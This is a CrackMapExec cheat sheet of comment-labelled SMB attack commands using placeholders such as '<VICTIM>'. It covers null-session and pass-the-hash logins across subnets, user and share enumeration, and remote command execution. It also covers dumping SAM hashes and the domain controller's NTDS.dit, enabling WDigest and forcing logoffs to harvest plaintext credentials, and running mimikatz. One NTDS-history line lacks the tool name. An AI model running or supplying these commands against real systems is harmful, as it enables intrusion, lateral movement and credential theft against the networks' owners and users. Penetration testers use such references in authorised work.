% crackmapexec

# null session
crackmapexec smb <IP> -u "" -p ""

# connect to target using local account
crackmapexec smb <IP> -u '<VICTIM>' -p '<PASS>' --local-auth

# pass the hash against a subnet
crackmapexec smb 172.16.157.0/24 -u '<VICTIM>' -H 'LMHASH:NTHASH' --local-auth
crackmapexec smb 172.16.157.0/24 -u '<VICTIM>' -H 'NTHASH'

# target format subnet list fqdn
crackmapexec smb ms.evilcorp.org
crackmapexec smb 192.168.1.0 192.168.0.2
crackmapexec smb 192.168.1.0-28 10.0.0.1-67
crackmapexec smb 192.168.1.0/24
crackmapexec smb targets.txt

# enumerate users
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --users
crackmapexec smb <IP_OR_SUBNET> -d '<DOMAIN>' -u '<VICTIM>' -p '<PASS>' --users

# perform rid bruteforce to get users
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --rid-brute

# enumerate domain groups
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --groups

# enumerate local users
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --local-auth

# generate a list of relayable hosts (smb signing disabled)
crackmapexec smb 192.168.1.0/24 --gen-relay-list output.txt

# enumerate available shares
crackmapexec smb 192.168.215.138 -u '<VICTIM>' -p '<PASS>' --local-auth --shares

# get the active sessions
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --sessions

# check logged in users
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --lusers

# get the password policy
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --pass-pol

# execute command through cmd.exe (admin privileges required)
crackmapexec smb 192.168.10.11 -u '<VICTIM>' -p 'P@ssw0rd' -x 'whoami'

# force the smbexec method (default order: wmiexec, atexec, smbexec)
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' -x 'net user '<VICTIM>' /domain' --exec-method smbexec

# execute commands through powershell (admin privileges required)
crackmapexec smb 192.168.10.11 -u '<VICTIM>' -p 'P@ssw0rd' -X 'whoami'

# dump local SAM hashes
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --local-auth --sam

# enable/disable WDigest to get credentials from the LSA memory; force the logoff and wait for logon
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --local-auth --wdigest enable
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --local-auth --wdigest disable
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' -x 'quser'
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' -x 'logoff <sessionid>'

# dump the NTDS.dit from DC using methods from secretsdump.py
crackmapexec smb 192.168.1.100 -u '<VICTIM>' -p '<PASS>' --ntds

# uses the volume shadow copy service
crackmapexec smb 192.168.1.100 -u '<VICTIM>' -p '<PASS>' --ntds vss

# dump the NTDS.dit password history
smb 192.168.1.0/24 -u '<VICTIM>' -p '<PASS>' --ntds-history

# list available modules
crackmapexec smb -L

# module information
crackmapexec smb -M mimikatz --module-info

# view module options
crackmapexec smb -M mimikatz --options

# mimikatz module
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' --local-auth -M mimikatz
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p '<PASS>' -M mimikatz
crackmapexec smb <IP_OR_SUBNET> -u '<VICTIM>' -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'

